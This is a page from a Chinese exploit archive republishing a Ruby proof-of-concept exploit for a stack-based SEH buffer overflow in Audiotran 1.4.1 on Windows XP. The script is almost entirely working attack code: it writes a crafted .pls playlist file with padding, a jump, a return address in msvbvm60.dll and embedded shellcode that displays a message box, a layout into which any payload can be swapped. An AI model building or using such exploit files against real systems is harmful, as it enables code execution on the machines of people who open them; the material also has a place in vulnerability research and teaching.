首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
来源:www.corelan.be 作者:Duquette 发布时间:2010-01-11  

#!/usr/bin/ruby
#
# Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
# Date          : January 9th, 2010
# Author        : Sébastien Duquette
# Software Link : http://www.e-soft.co.uk/Audiotran.htm
# Version       : 1.4.1
# OS            : Windows
# Tested on     : XP SP2/SP3 En (VMware)
# Type of vuln  : Stack Overflow / SEH
# Greetz to     : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
#

banner =
"|------------------------------------------------------------------|\n" +
"|                         __               __                      |\n" +
"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n" +
"|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n" +
"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n" +
"| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n" +
"|                                                                  |\n" +
"|                                       http://www.corelan.be:8800 |\n" +
"|                                                                  |\n" +
"|-------------------------------------------------[ EIP Hunters ]--|\n\n"

# Corelan Team MsgBox
payload =
"\xeb\x22\x56\x31\xc0\x64\x8b\x40\x30\x85\xc0\x78" +
"\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb" +
"\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x5e\xc3" +
"\xeb\x69\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54" +
"\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb" +
"\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" +
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
"\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb" +
"\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b" +
"\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8" +
"\xaa\xff\xff\xff\x89\x07\x44\x44\x44\x44\x44\x44" +
"\x44\x44\x47\x47\x47\x47\x39\xce\x75\xe6\xc3\x4c" +
"\x4c\x4c\x4c\x89\xe5\xe8\x68\xff\xff\xff\x89\xc2" +
"\xeb\x1c\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8" +
"\xc8\xff\xff\xff\xeb\x15\x31\xd2\x59\x88\x51\x36" +
"\x51\x52\xff\x54\x24\x0c\xe8\xdf\xff\xff\xff\x57" +
"\x7f\x29\x62\xe8\xe6\xff\xff\xff\x43\x6f\x72\x65" +
"\x6c\x61\x6e\x20\x54\x65\x61\x6d\x20\x53\x68\x65" +
"\x6c\x6c\x63\x6f\x64\x65\x20\x2d\x20\x50\x72\x6f" +
"\x67\x72\x61\x6d\x20\x65\x78\x70\x6c\x6f\x69\x74" +
"\x65\x64\x20\x73\x75\x63\x65\x73\x73\x66\x75\x6c" +
"\x6c\x79\x58"

print banner
puts "[+] Exploit for Audiotran 1.4.1."

filename = "audiotran_poc.pls"
f = File.new(filename, 'w')
f.write 'A' * 1308 #padding
f.write "\xeb\x06\x90\x90"
f.write "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
f.write payload
f.write 'A' * 9000 # padding
f.close

puts "[+] Wrote exploit file : #{filename}."


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Live Messenger 2009 Ac
·Real Player Local Crash Poc
·SPlayer XvidDecoder v3.3 Activ
·Soritong v1.0 Universal BOF-SE
·Mac OS X versions 10.5 and 10.
·YPOPS! v0.9.7.3 Buffer Overflo
·VLC Player v0.8.6i ActiveX DoS
·JcomBand toolbar on IE ActiveX
·ttplayer=5.6Beta3 Dos POC
·Kantaris 0.5.6 local Denial of
·Gnome Panel <= 2.28.0 Denial o
·Total Multimedia Features DoS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved